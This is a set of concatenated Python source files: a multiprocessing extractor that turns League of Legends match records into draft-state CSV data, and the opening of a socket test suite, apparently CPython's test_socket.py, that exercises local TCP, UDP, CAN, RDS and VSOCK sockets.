self.nb_err = StdOutReader(self.process.stderr, verbose=self._verbose)
self.nb_out = StdOutReader(self.process.stdout, verbose=self._verbose)
while True:
if self.ready_str in self.nb_err.readline() or self.ready_str in self.nb_out.readline():
break
return self
def kill(self):
if self.process is not None:
print("killing: {} : {}".format(self.name, self.process.pid))
self.process.kill()
self.nb_err.stop()
self.nb_out.stop()
outs, errs = self.process.communicate()
if outs or errs:
print("kill outs:{}".format(outs))
print("kill errs:{}".format(errs))
|
DataExtractor.py
|
# Extract the useful data from game files (json)
# Append the useful data to a csv file
import pickle
import os
import queue
import sys
from collections import OrderedDict
import multiprocessing
from multiprocessing.managers import BaseManager, NamespaceProxy
import time
import Modes
import pandas as pd
from collections import Counter
CHUNK_SIZE = 100
def extracted_writer(extracted_file, q, stop):
with open(extracted_file, 'a+') as f:
while not stop.is_set():
try:
game_path = q.get(timeout=1)
except queue.Empty:
continue
f.write(game_path)
f.write('\n')
print('Closing writer', file=sys.stderr)
class Extractor:
def __init__(self, mode, extracted_files, current_index, rot_length, writing_q):
self.mode = mode
self.rot_length = rot_length
self.writing_q = writing_q
self.current_index = current_index
if len(extracted_files) >= self.current_index > 0:  # the file already exists
self.csv_file = os.path.join(mode.EXTRACTED_DIR, extracted_files[self.current_index - 1])
self.csv_index = len(pd.read_csv(self.csv_file, skiprows=1))
print(self.csv_file, 'lines', self.csv_index, file=sys.stderr)
else:
self.csv_file = None
self.csv_index = mode.DATA_LINES
class ExManager(BaseManager):
pass
class ExProxy(NamespaceProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__', 'b')
ExManager.register('Extractor', Extractor, ExProxy)
def run(mode, cpu):
extracted_file = mode.EXTRACTED_FILE
if os.path.isfile(extracted_file):
with open(extracted_file, 'r') as f:
extracted_list = [x.strip() for x in f.readlines()]
else:
extracted_list = []
gamePaths = []
for patch in mode.learning_patches:
for region in mode.REGIONS:
if os.path.isdir(os.path.join(mode.DATABASE, 'patches', patch, region)):
gamePaths.extend(
[os.path.join(mode.DATABASE, 'patches', patch, region, f) for f in
os.listdir(os.path.join(mode.DATABASE, 'patches', patch, region))])
print('%d game files found' % len(gamePaths), file=sys.stderr)
gamePaths = list(set(gamePaths) - set(extracted_list))
print('%d new games to extract' % len(gamePaths), file=sys.stderr)
if not os.path.isdir(mode.EXTRACTED_DIR):
os.makedirs(mode.EXTRACTED_DIR)
extracted_files = [f for f in os.listdir(mode.EXTRACTED_DIR)]
l = list(map(lambda x: int(x.replace('data_', '').replace('.csv', '')), extracted_files))
l = sorted(range(len(l)), key=lambda k: l[k])
extracted_files = [extracted_files[k] for k in l]
# multiprocessing
manager = multiprocessing.Manager()
writing_q = manager.Queue()
stop = manager.Event()
writer = multiprocessing.Process(target=extracted_writer, args=(extracted_file, writing_q, stop))
writer.start()
ex_manager = ExManager()
ex_manager.start()
available_extractors = []
running_extractors = []
for i in range(cpu):
current_index = len(extracted_files) - i
# noinspection PyUnresolvedReferences
available_extractors.append(ex_manager.Extractor(mode, extracted_files, current_index, cpu, writing_q))
while gamePaths:
# we work with chunks in order to save time (no need to hand over the extractor for every single game)
chunk = gamePaths[:CHUNK_SIZE]
gamePaths = gamePaths[CHUNK_SIZE:]
print(len(gamePaths), 'left', file=sys.stderr)
while not available_extractors: # wait until an extractor is available
for p, ex in running_extractors:
if p.is_alive():
continue
available_extractors.append(ex)
running_extractors.remove((p, ex))
if not available_extractors: # wait a bit
time.sleep(0.001)
# start a new job
ex = available_extractors.pop()
p = multiprocessing.Process(target=analyze_game, args=(ex, chunk,))
running_extractors.append((p, ex))
p.start()
for p, ex in running_extractors:
p.join()
stop.set()
writer.join()
print('-- Extraction complete --')
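# Note on the loop above: it is a hand-rolled worker pool rather than a multiprocessing.Pool,
# because each Extractor proxy lives in the ExManager server process and carries its own csv
# rotation state (csv_file / csv_index). Finished workers are recycled from running_extractors
# back into available_extractors and handed the next CHUNK_SIZE-sized slice of gamePaths.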
def analyze_game(ex, gamePaths):
for gamePath in gamePaths:
raw_data = OrderedDict([('s_' + champ, []) for champ in ex.mode.CHAMPIONS_LABEL] + [('p_' + champ, []) for champ in ex.mode.CHAMPIONS_LABEL])
raw_data['patch'] = []
raw_data['win'] = []
raw_data['file'] = []
print(ex.csv_file, gamePath)
game = pickle.load(open(gamePath, 'rb'))
bans = []
game_patch = '_'.join(game['gameVersion'].split('.')[:2])
if game['gameDuration'] < 300:
print(gamePath, 'FF afk', game['gameDuration'], file=sys.stderr)
ex.writing_q.put(gamePath)
continue
blueTeam = None
redTeam = None
for team in game['teams']:
if team['teamId'] == 100:
blueTeam = team
elif team['teamId'] == 200:
redTeam = team
else:
print(gamePath, 'Unrecognized team %d' % team['teamId'], file=sys.stderr)
break
for ban in team['bans']:
championId = ban['championId']
if championId not in bans:
bans.append(championId)
if not blueTeam or not redTeam:
print(gamePath, 'Teams are not recognized', file=sys.stderr)
ex.writing_q.put(gamePath)
continue
# not sure what is written for voided games, so it's safer to check both
# if we get something other than true/false or false/true we just ignore the file
blueWin = blueTeam['win'] == 'Win'
redWin = redTeam['win'] == 'Win'
if not blueWin ^ redWin:
print(gamePath, 'No winner found', blueWin, redWin, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
participants = game['participants']
# Blank, everything is available
state = OrderedDict()
state['win'] = int(blueWin)
state['patch'] = game_patch
state['file'] = os.path.basename(gamePath)
state.update([('s_' + champ_name, 'A') for champ_name in ex.mode.CHAMPIONS_LABEL]) # Status
state.update([('p_' + champ_name, 'N') for champ_name in ex.mode.CHAMPIONS_LABEL]) # Position
for key, value in state.items():
raw_data[key].append(value)
# Bans
state = OrderedDict(state) # don't forget to create a clean copy
for championId in bans:
for champ_name, champ_id in ex.mode.CHAMPIONS_ID.items():
if champ_id == championId:
state['s_' + champ_name] = 'N' # None
break
for key, value in state.items():
raw_data[key].append(value)
# Smart lane-role
# The Api doesn't precisely give players role, so we have to deduce it
b_roles = OrderedDict()
r_roles = OrderedDict()
for i in range(0, 10):
p = participants[i]
lane = p['timeline']['lane']
if i < 5:
if lane == 'TOP':
b_roles[i] = 'T'
elif lane == 'JUNGLE':
b_roles[i] = 'J'
elif lane == 'MIDDLE':
b_roles[i] = 'M'
elif lane == 'BOTTOM':
b_roles[i] = 'C'
elif lane == 'NONE':
b_roles[i] = '?' # Fill missing lane if possible
else:
raise Exception(p, lane)
else:
if lane == 'TOP':
r_roles[i] = 'T'
elif lane == 'JUNGLE':
r_roles[i] = 'J'
elif lane == 'MIDDLE':
r_roles[i] = 'M'
elif lane == 'BOTTOM':
r_roles[i] = 'C'
elif lane == 'NONE':
r_roles[i] = '?' # Fill missing lane if possible
else:
raise Exception(p, lane)
# Fill missing role '?'
# target at this point is something like 'T', 'J', 'M', 'C', 'C'
b_toFillCount = Counter(b_roles.values())['?']
if b_toFillCount > 1:
print(gamePath, 'fucked up roles', b_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
elif b_toFillCount == 1:
fill_index = list(b_roles.keys())[list(b_roles.values()).index('?')]
possible_roles = ['T', 'J', 'M', 'C']
missing_roles = list(set(possible_roles)-set(b_roles.values()))
if len(missing_roles) == 1:
# non-bot role
b_roles[fill_index] = missing_roles[0]
elif len(missing_roles) == 0:
# bot, whether it is support will be determined later
b_roles[fill_index] = 'C'
else:
print(gamePath, 'fucked up roles', b_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
r_toFillCount = Counter(r_roles.values())['?']
if r_toFillCount > 1:
print(gamePath, 'fucked up roles', r_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
elif r_toFillCount == 1:
fill_index = list(r_roles.keys())[list(r_roles.values()).index('?')]
possible_roles = ['T', 'J', 'M', 'C']
missing_roles = list(set(possible_roles)-set(r_roles.values()))
if len(missing_roles) == 1:
# non-bot role
r_roles[fill_index] = missing_roles[0]
elif len(missing_roles) == 0:
# bot, whether it is support will be determined later
r_roles[fill_index] = 'C'
else:
print(gamePath, 'fucked up roles', r_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
# need to find the support in both team
# a lane will appear twice, most likely 'C'
# the support will either be tagged as 'SUPPORT' or have a low cs count
b_doubleRole = Counter(b_roles.values()).most_common(1)[0][0]
b_doublei = [i for i, r in b_roles.items() if r == b_doubleRole]
if len(b_doublei) > 2:
print(gamePath, 'fucked up roles', b_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
if 'SUPPORT' in participants[b_doublei[0]]['timeline']['role']:
b_roles[b_doublei[0]] = 'S'
elif 'SUPPORT' in participants[b_doublei[1]]['timeline']['role']:
b_roles[b_doublei[1]] = 'S'
else: # Last resort -> check cs
if 'creepsPerMinDeltas' in participants[b_doublei[0]]['timeline']:
if participants[b_doublei[0]]['timeline']['creepsPerMinDeltas']['0-10'] < \
participants[b_doublei[1]]['timeline']['creepsPerMinDeltas']['0-10']:
b_roles[b_doublei[0]] = 'S'
else:
b_roles[b_doublei[1]] = 'S'
else:
if participants[b_doublei[0]]['stats']['totalMinionsKilled'] < participants[b_doublei[1]]['stats']['totalMinionsKilled']:
b_roles[b_doublei[0]] = 'S'
else:
b_roles[b_doublei[1]] = 'S'
r_doubleRole = Counter(r_roles.values()).most_common(1)[0][0]
r_doublei = [i for i, r in r_roles.items() if r == r_doubleRole]
if len(r_doublei) > 2:
print(gamePath, 'fucked up roles', r_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
if 'SUPPORT' in participants[r_doublei[0]]['timeline']['role']:
r_roles[r_doublei[0]] = 'S'
elif 'SUPPORT' in participants[r_doublei[1]]['timeline']['role']:
r_roles[r_doublei[1]] = 'S'
else: # Last resort -> check cs
if 'creepsPerMinDeltas' in participants[r_doublei[0]]['timeline']:
if participants[r_doublei[0]]['timeline']['creepsPerMinDeltas']['0-10'] < \
participants[r_doublei[1]]['timeline']['creepsPerMinDeltas']['0-10']:
r_roles[r_doublei[0]] = 'S'
else:
r_roles[r_doublei[1]] = 'S'
else:
if participants[r_doublei[0]]['stats']['totalMinionsKilled'] < participants[r_doublei[1]]['stats']['totalMinionsKilled']:
r_roles[r_doublei[0]] = 'S'
else:
r_roles[r_doublei[1]] = 'S'
roles = OrderedDict()
roles.update(b_roles)
roles.update(r_roles)
# Draft
DRAFT_ORDER = [0, 5, 6, 1, 2, 7, 8, 3, 4, 9] # This is not exact. This order is not pick order but end-draft order: if some players
# trade, this order is wrong. Unfortunately there is no way to know the real pick order. So we just assume people don't trade often and
# that trading does not have a huge impact anyway.
for i in DRAFT_ORDER:
state = OrderedDict(state)
bluePick = i < 5
p = participants[i]
championId = p['championId']
for champ_name, champ_id in ex.mode.CHAMPIONS_ID.items():
if champ_id == championId:
state['s_' + champ_name] = 'B' if bluePick else 'R'
state['p_' + champ_name] = roles[i]
break
for key, value in state.items():
raw_data[key].append(value)
df = pd.DataFrame(raw_data, columns=ex.mode.COLUMNS)
if ex.csv_index + len(df) < ex.mode.DATA_LINES:
df.to_csv(ex.csv_file, mode='a', header=False, index=False)
ex.csv_index += len(df)
else: # split the data in two: finish prev file and start another
to_current = df.iloc[:ex.mode.DATA_LINES - ex.csv_index]
to_next = df.iloc[ex.mode.DATA_LINES - ex.csv_index:]
to_current.to_csv(ex.csv_file, mode='a', header=False, index=False)
# preparing new file
ex.current_index += ex.rot_length
current_file = 'data_' + str(ex.current_index) + '.csv'
ex.csv_file = os.path.join(ex.mode.EXTRACTED_DIR, current_file)
ex.csv_index = 0
to_next.to_csv(ex.csv_file, mode='a', header=True, index=False)
ex.csv_index += len(to_next)
# File fully explored
ex.writing_q.put(gamePath)
if __name__ == '__main__':
m = Modes.ABR_TJMCS_Mode(['7.16', '7.17'])
run(m, max(multiprocessing.cpu_count() - 1, 1))
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _is_fd_in_blocking_mode(sock):
return not bool(
fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
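# Hedged illustration (not a class defined in this excerpt): a concrete sendmsg()/recvmsg()
# test class is assembled by stacking a behaviour mixin on top of these bases, e.g.
#
#     class MySendmsgTCPTest(SomeSendmsgMixin, ConnectedStreamTestMixin, TCPTestBase):
#         pass
#
# where SomeSendmsgMixin (hypothetical) provides the actual test methods and the bases supply
# the connected self.serv_conn / self.cli_conn pair plus serv_addr / cli_addr.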
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
